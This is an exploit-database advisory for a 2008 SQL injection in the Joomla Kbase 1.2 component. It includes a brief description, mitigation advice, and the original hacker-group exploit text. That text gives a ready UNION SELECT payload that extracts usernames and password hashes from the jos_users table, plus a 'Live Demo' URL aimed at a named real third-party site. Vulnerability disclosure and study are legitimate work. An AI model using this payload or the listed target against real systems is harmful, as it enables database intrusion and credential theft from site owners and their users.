Joomla Component Kbase SQL Injection Vulnerability

vendor:

Kbase

by:

H!tm@N

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Kbase

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:joomla:kbase

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component Kbase SQL Injection Vulnerability

An SQL injection vulnerability exists in Joomla Component Kbase version 1.2. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to gain access to sensitive information stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL queries to the vulnerable script. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to ensure that untrusted data is not allowed to enter the system. All input data should be validated and filtered for malicious content. It is also recommended to use the latest version of the application.

Source

Exploit-DB raw data:

#############################################################################
#							                    #
#            Joomla Component Kbase SQL Injection Vulnerability             #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Kbase (com_kbase)"  
[~] Version:       "1.2"
[~] Date:          "?.?.2008"
[~] Author:        "John Messingham Development Services"
[~] Author E-mail: "mail@jmds.eu"
[~] Author URL:    "www.jmds.eu"

########################################

[~] Exploit: /index.php?option=com_kbase&view=article&id=[SQL]

[~] Example: /index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

########################################

[~] Live Demo: http://netserv.ncesd.org/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2008-10-24]